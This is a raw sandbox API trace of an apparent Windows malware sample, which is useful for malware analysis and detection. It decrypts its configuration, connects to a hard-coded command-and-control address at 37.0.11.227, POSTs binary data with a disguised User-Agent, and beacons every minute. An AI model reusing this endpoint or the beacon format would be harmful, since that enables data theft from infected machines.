[0229.906] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0229.906] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0229.907] GetProcessHeap () returned 0x690000 [0229.907] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0229.909] GetProcessHeap () returned 0x690000 [0229.910] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0229.910] GetProcessHeap () returned 0x690000 [0229.910] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4418 | out: hHeap=0x690000) returned 1 [0229.910] GetProcessHeap () returned 0x690000 [0229.910] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0229.911] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0229.911] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0229.917] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0229.917] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aee58) returned 1 [0229.927] GetProcessHeap () returned 0x690000 [0229.927] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88b0 [0229.928] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0229.928] CryptImportKey (in: hProv=0x6aee58, pbData=0x6a88b0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfa8) returned 1 [0229.929] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0229.929] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0229.930] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0229.930] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0229.930] GetProcessHeap () returned 0x690000 [0229.930] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88b0 | out: hHeap=0x690000) returned 1 [0229.931] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0229.931] CryptDecrypt (in: hKey=0x69cfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0229.932] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0229.932] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0229.932] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0229.933] CryptReleaseContext (hProv=0x6aee58, dwFlags=0x0) returned 1 [0229.933] GetProcessHeap () returned 0x690000 [0229.933] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0229.933] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0229.934] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0229.934] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0229.934] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0229.935] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0229.935] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0229.936] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0229.936] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0229.936] GetProcessHeap () returned 0x690000 [0229.936] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0229.936] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0229.936] GetProcessHeap () returned 0x690000 [0229.936] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab3e0 [0229.936] socket (af=2, type=1, protocol=6) returned 0x5e8 [0229.937] connect (s=0x5e8, name=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0229.966] FreeAddrInfoW (pAddrInfo=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0229.966] GetProcessHeap () returned 0x690000 [0229.966] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6af100 [0229.967] GetProcessHeap () returned 0x690000 [0229.967] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b67a8 [0229.967] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0229.969] wvsprintfA (in: param_1=0x6b67a8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0229.969] GetProcessHeap () returned 0x690000 [0229.969] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6af500 [0229.969] GetProcessHeap () returned 0x690000 [0229.969] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b67a8 | out: hHeap=0x690000) returned 1 [0229.970] GetProcessHeap () returned 0x690000 [0229.970] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4730 [0229.970] GetProcessHeap () returned 0x690000 [0229.970] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b67a8 [0229.970] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0229.971] wvsprintfA (in: param_1=0x6b67a8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0229.971] GetProcessHeap () returned 0x690000 [0229.971] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0229.971] GetProcessHeap () returned 0x690000 [0229.972] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b67a8 | out: hHeap=0x690000) returned 1 [0229.972] send (s=0x5e8, buf=0x6ad508*, len=242, flags=0) returned 242 [0229.973] send (s=0x5e8, buf=0x6aba40*, len=159, flags=0) returned 159 [0229.973] GetProcessHeap () returned 0x690000 [0229.973] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0229.973] recv (in: s=0x5e8, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0230.038] GetProcessHeap () returned 0x690000 [0230.039] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0230.042] GetProcessHeap () returned 0x690000 [0230.042] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0230.043] GetProcessHeap () returned 0x690000 [0230.043] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af500 | out: hHeap=0x690000) returned 1 [0230.043] GetProcessHeap () returned 0x690000 [0230.043] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af100 | out: hHeap=0x690000) returned 1 [0230.043] closesocket (s=0x5e8) returned 0 [0230.044] GetProcessHeap () returned 0x690000 [0230.044] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab3e0 | out: hHeap=0x690000) returned 1 [0230.044] GetProcessHeap () returned 0x690000 [0230.045] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0230.045] GetProcessHeap () returned 0x690000 [0230.045] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0230.045] GetProcessHeap () returned 0x690000 [0230.046] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0230.046] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x76c) returned 0x5e8 [0230.048] Sleep (dwMilliseconds=0xea60) [0230.049] GetProcessHeap () returned 0x690000 [0230.049] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0230.050] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0230.051] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0230.056] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0230.057] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aedd0) returned 1 [0230.066] GetProcessHeap () returned 0x690000 [0230.066] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a00 [0230.067] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0230.068] CryptImportKey (in: hProv=0x6aedd0, pbData=0x6a8a00, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0230.069] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0230.069] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0230.070] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0230.070] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0230.070] GetProcessHeap () returned 0x690000 [0230.071] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a00 | out: hHeap=0x690000) returned 1 [0230.072] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0230.072] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0230.075] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0230.086] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0230.090] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0230.090] CryptReleaseContext (hProv=0x6aedd0, dwFlags=0x0) returned 1 [0230.091] GetProcessHeap () returned 0x690000 [0230.091] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6abd08 [0230.091] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0230.092] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0230.167] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0230.168] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0230.168] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0230.169] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0230.169] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0230.170] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0230.170] GetProcessHeap () returned 0x690000 [0230.170] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0230.170] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0230.170] GetProcessHeap () returned 0x690000 [0230.171] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0230.171] GetProcessHeap () returned 0x690000 [0230.171] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0230.171] GetProcessHeap () returned 0x690000 [0230.172] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0230.172] GetProcessHeap () returned 0x690000 [0230.172] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0230.172] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0230.173] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0230.180] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0230.181] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aed48) returned 1 [0230.188] GetProcessHeap () returned 0x690000 [0230.188] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a00 [0230.189] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0230.189] CryptImportKey (in: hProv=0x6aed48, pbData=0x6a8a00, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0230.190] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0230.190] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0230.190] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0230.191] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0230.191] GetProcessHeap () returned 0x690000 [0230.191] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a00 | out: hHeap=0x690000) returned 1 [0230.194] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0230.195] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0230.195] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0230.195] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0230.198] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0230.198] CryptReleaseContext (hProv=0x6aed48, dwFlags=0x0) returned 1 [0230.198] GetProcessHeap () returned 0x690000 [0230.198] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0230.199] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0230.199] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0230.200] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0230.200] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0230.201] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0230.201] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0230.201] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0230.202] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0230.202] GetProcessHeap () returned 0x690000 [0230.202] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0230.202] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0230.202] GetProcessHeap () returned 0x690000 [0230.202] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab490 [0230.202] socket (af=2, type=1, protocol=6) returned 0x5ec [0230.202] connect (s=0x5ec, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0230.226] FreeAddrInfoW (pAddrInfo=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0230.226] GetProcessHeap () returned 0x690000 [0230.226] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0230.226] GetProcessHeap () returned 0x690000 [0230.227] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b67a8 [0230.227] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0230.228] wvsprintfA (in: param_1=0x6b67a8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0230.228] GetProcessHeap () returned 0x690000 [0230.228] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afa40 [0230.228] GetProcessHeap () returned 0x690000 [0230.228] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b67a8 | out: hHeap=0x690000) returned 1 [0230.229] GetProcessHeap () returned 0x690000 [0230.229] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4148 [0230.229] GetProcessHeap () returned 0x690000 [0230.229] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b67a8 [0230.229] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0230.230] wvsprintfA (in: param_1=0x6b67a8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0230.230] GetProcessHeap () returned 0x690000 [0230.230] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0230.230] GetProcessHeap () returned 0x690000 [0230.230] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b67a8 | out: hHeap=0x690000) returned 1 [0230.231] send (s=0x5ec, buf=0x6ad508*, len=242, flags=0) returned 242 [0230.231] send (s=0x5ec, buf=0x6aba40*, len=159, flags=0) returned 159 [0230.231] GetProcessHeap () returned 0x690000 [0230.231] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0230.231] recv (in: s=0x5ec, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0230.303] GetProcessHeap () returned 0x690000 [0230.303] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0230.304] GetProcessHeap () returned 0x690000 [0230.304] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0230.304] GetProcessHeap () returned 0x690000 [0230.305] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afa40 | out: hHeap=0x690000) returned 1 [0230.305] GetProcessHeap () returned 0x690000 [0230.305] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0230.306] closesocket (s=0x5ec) returned 0 [0230.306] GetProcessHeap () returned 0x690000 [0230.306] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab490 | out: hHeap=0x690000) returned 1 [0230.306] GetProcessHeap () returned 0x690000 [0230.307] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0230.308] GetProcessHeap () returned 0x690000 [0230.308] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0230.308] GetProcessHeap () returned 0x690000 [0230.308] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0230.309] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xb0) returned 0x5ec [0230.310] Sleep (dwMilliseconds=0xea60) [0230.312] GetProcessHeap () returned 0x690000 [0230.312] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4418 [0230.312] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0230.313] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0230.320] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0230.320] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af100) returned 1 [0230.326] GetProcessHeap () returned 0x690000 [0230.326] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a00 [0230.327] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0230.327] CryptImportKey (in: hProv=0x6af100, pbData=0x6a8a00, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0230.330] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0230.331] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0230.331] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0230.332] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0230.332] GetProcessHeap () returned 0x690000 [0230.332] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a00 | out: hHeap=0x690000) returned 1 [0230.333] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0230.334] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4418, pdwDataLen=0x19fcfc | out: pbData=0x6a4418, pdwDataLen=0x19fcfc) returned 1 [0230.334] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0230.334] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0230.335] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0230.335] CryptReleaseContext (hProv=0x6af100, dwFlags=0x0) returned 1 [0230.336] GetProcessHeap () returned 0x690000 [0230.336] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6abd08 [0230.336] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0230.337] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0230.337] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0230.338] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0230.338] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0230.338] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0230.341] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0230.341] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0230.341] GetProcessHeap () returned 0x690000 [0230.341] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0230.341] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0230.342] GetProcessHeap () returned 0x690000 [0230.342] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0230.345] GetProcessHeap () returned 0x690000 [0230.346] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0230.346] GetProcessHeap () returned 0x690000 [0230.346] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4418 | out: hHeap=0x690000) returned 1 [0230.346] GetProcessHeap () returned 0x690000 [0230.346] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4418 [0230.347] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0230.347] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, 